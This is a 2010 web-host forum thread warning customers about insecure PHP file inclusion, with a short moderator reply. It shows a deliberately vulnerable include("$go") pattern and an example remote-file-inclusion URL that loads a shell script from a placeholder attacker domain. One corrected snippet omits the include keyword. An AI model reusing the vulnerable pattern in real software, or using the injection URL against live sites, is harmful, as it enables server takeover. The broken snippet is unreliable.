Nexology Community
 
     
 
   

Go Back   Nexology Community > Nexus Zone > News and Announcements
Reload this Page PHP Security and YOU - Including files the right way

Reply
 
LinkBack Thread Tools Display Modes
Old 06-21-2010, 03:55 AM   #1
HN Top Canine
 
NexDog's Avatar
 
Join Date: Jan 2002
Location: The Nexus
Posts: 13,347
Post PHP Security and YOU - Including files the right way
As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

PHP Code:
<?php
   include("http://www.myowndomain.com/something.txt");
?>
External:

PHP Code:
<?php
   include("http://www.externaldomain.com/something.txt");
?>
Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

PHP Code:
<?php
   ('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

PHP Code:
<?php
   include("http://www.externaldomain.com/something.txt");
?>
The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

PHP Code:
<?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "</html>\n";
?>
The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP's readfile() function instead:

PHP: readfile - Manual

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

We'd love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these fuctions then please do revisit your code and help yourself to secure your data and server.
__________________
Laurence - [HostNexus Administrator]

- Need Support? Quickest reponses are found at the Support Helpdesk!
- Stay in touch! Make sure you are subscribed to our Lists.
NexDog is offline   Reply With Quote
Old 06-28-2010, 02:09 PM   #2
Moderator
 
MikeMann's Avatar
 
Join Date: Jun 2002
Location: Los Angeles CA
Posts: 7,532
For the root, I usually define it:
define('ROOT', $_SERVER["DOCUMENT_ROOT"]);

and then I use it in an include like this:
include (ROOT."/folder/file.ext");
__________________
Michael Mann

Michael Mann Desktop Publishing
 Me On the Net: Facebook | Twitter

Read My Writing

Need a notary in Los Angeles?
I'm a mobile notary
MikeMann is offline   Reply With Quote
Reply

« Previous Thread | Next Thread »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT -5. The time now is 05:56 AM.

Contact Us - Hostnexus - Privacy Statement - Top

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.3.0 RC1
Copyright ©2001 - 2009, HostNexus